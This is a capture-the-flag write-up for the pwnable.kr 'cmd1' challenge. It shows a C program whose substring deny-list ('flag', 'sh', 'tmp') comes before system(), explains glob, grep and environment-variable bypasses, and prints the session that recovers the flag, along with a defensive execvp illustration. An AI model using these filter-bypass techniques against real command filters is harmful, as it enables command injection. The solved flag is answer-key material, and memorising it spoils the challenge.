pwnable.kr —— cmd1

question

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

The challenge asks us to log in to the server over ssh with ssh cmd1@pwnable.kr -p2222, password guest. Sometimes host key verification gets in the way of the login; in that case add the option -o StrictHostKeyChecking=no when connecting.

cmd1

    #include <stdio.h>
    #include <stdlib.h>   /* putenv, system */
    #include <string.h>

    /* Deny-list check on the literal command string: returns non-zero if
     * any of the substrings "flag", "sh" or "tmp" is present. */
    int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
    }

    int main(int argc, char* argv[], char** envp){
        /* PATH is replaced, so commands must be given by absolute path */
        putenv("PATH=/thankyouverymuch");
        if(filter(argv[1])) return 0;
        /* the string is handed to /bin/sh, which expands globs and variables
         * only after the filter above has already run */
        system( argv[1] );
        return 0;
    }

analyse

Note that the input command is filtered: any command containing the substrings sh, tmp or flag is rejected.

  1. cat method
    Use f* in place of flag.

  2. grep method
    As above, using a wildcard.

  3. Environment variable method
    Create an environment variable whose value is flag.

Besides these, a symbolic link, executing another file, and similar tricks would also work.
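To make the underlying weakness concrete, here is an added illustration that is not part of the original writeup or the challenge binary: the challenge's filter() beside a check for shell metacharacters and a hypothetical runner that uses execvp() instead of system(). The filter sees only the literal string, while /bin/sh expands f* and $f afterwards; avoiding the shell removes that expansion step entirely.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The challenge's filter, reproduced for comparison: it inspects only the
 * literal string, before /bin/sh ever expands globs or variables. */
int filter(const char *cmd) {
    int r = 0;
    r += strstr(cmd, "flag") != NULL;
    r += strstr(cmd, "sh")   != NULL;
    r += strstr(cmd, "tmp")  != NULL;
    return r;
}

/* Returns 1 if the string contains characters /bin/sh would interpret
 * (globbing, variable expansion, command substitution, separators, quoting).
 * Any such character means the literal string is not what will actually run. */
int has_shell_metachars(const char *cmd) {
    return strpbrk(cmd, "*?[$`;|&<>(){}'\"\\~") != NULL;
}

/* Hypothetical hardened runner (not the challenge's code): split on
 * whitespace and execvp() the tokens directly. No shell is involved, so
 * "f*" and "$f" reach the program as literal arguments and never expand.
 * Returns the child's exit status, or -1 on error. */
int run_without_shell(const char *cmd) {
    char buf[256];
    char *argv[32];
    int argc = 0;
    if (strlen(cmd) >= sizeof buf) return -1;
    strcpy(buf, cmd);
    for (char *tok = strtok(buf, " \t"); tok && argc < 31; tok = strtok(NULL, " \t"))
        argv[argc++] = tok;
    argv[argc] = NULL;
    if (argc == 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execvp(argv[0], argv); _exit(127); }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```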

get flag

cmd1@ubuntu:~$ ./cmd1 "/bin/cat f*"
mommy now I get what PATH environment is for :)
cmd1@ubuntu:~$ ./cmd1 "/bin/grep -Rn :"
Binary file cmd1 matches
flag:1:mommy now I get what PATH environment is for :)
/bin/grep: .bash_history: Permission denied
cmd1@ubuntu:~$ export f=flag
cmd1@ubuntu:~$ ./cmd1 "/bin/cat \$f"
mommy now I get what PATH environment is for :)

flag: mommy now I get what PATH environment is for :)